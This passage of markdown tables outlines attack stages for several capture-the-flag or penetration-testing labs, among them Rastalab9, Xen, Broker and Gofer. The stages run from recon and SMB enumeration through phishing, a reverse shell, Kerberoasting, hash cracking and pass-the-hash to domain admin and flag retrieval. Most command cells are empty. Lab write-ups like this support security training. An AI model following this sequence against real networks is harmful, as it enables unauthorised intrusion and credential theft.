2 | Remote Shell | Impacket psexec | Use impacket psexec to get shell on dc01 |
3 | Log Enumeration | Windows Event Logs | `Get-EventLog -LogName "Application" |
4 | Flag Discovery | Log Analysis | Flag found: |
# Rastalab9
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | File Access | Accessing Network Share | |
2 | File Conversion | Convert PPK to OpenSSH | |
3 | SSH Connection | Proxychains with SSH | |
4 | Privilege Escalation | Compile and Transfer Exploit | |
5 | File Transfer | Secure Copy (SCP) with Proxychains | |
6 | Flag Discovery | Flag Retrieval | Flag found: |
# Xen
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | NMAP Scan | |
2 | Web Enumeration | Directory Enumeration with wfuzz | |
3 | SMTP Enumeration | smtp-user-enum | |
4 | Phishing | Crafting Email | |
5 | Access | Citrix XenAPP | Login with captured credentials |
6 | Gaining a Shell | Reverse Shell with msfvenom | |
7 | Privilege Escalation | Local Exploit Suggester | |
8 | Network Scanning | Internal Network Scan | Use auxiliary/server/socks4a in Metasploit for proxying |
9 | Kerberoasting | Harvesting Tickets | |
10 | Password Cracking | hashcat | |
11 | SMB Access | smbmap and smbclient | |
12 | Putty File Conversion | putty2john | |
13 | NetScaler Access | SSH with Private Key | |
14 | Traffic Analysis | tcpdump | `tcpdump -s 0 -A -n -l |
15 | LDAP Passwords | Capture and Analyze with Wireshark | |
16 | Domain Privilege | WinRM Access | |
17 | Shadow Copies | Diskshadow | |
18 | Domain Admin Access | Pass the Hash | |
# Broker
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan, Enumerating SMB | |
2 | Gaining Access | Exploiting SMB vulnerability | |
3 | Enumeration | Searching for files, Analyzing found files | |
4 | Privilege Esc. | Using credentials found, Accessing Azure | |
5 | Post-Exploitation | Dumping hashes, Cracking hashes | |
# Gofer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Scanning with nmap | |
2 | SMB Enumeration | Enumerate shares with netexec | |
3 | SMB Access | Access SMB share with smbclient | |
4 | Email Analysis | Analyze backup email | |
5 | Subdomain Enum | Brute force subdomains with ffuf | |
6 | Proxy Access | Fuzzing HTTP methods on proxy | |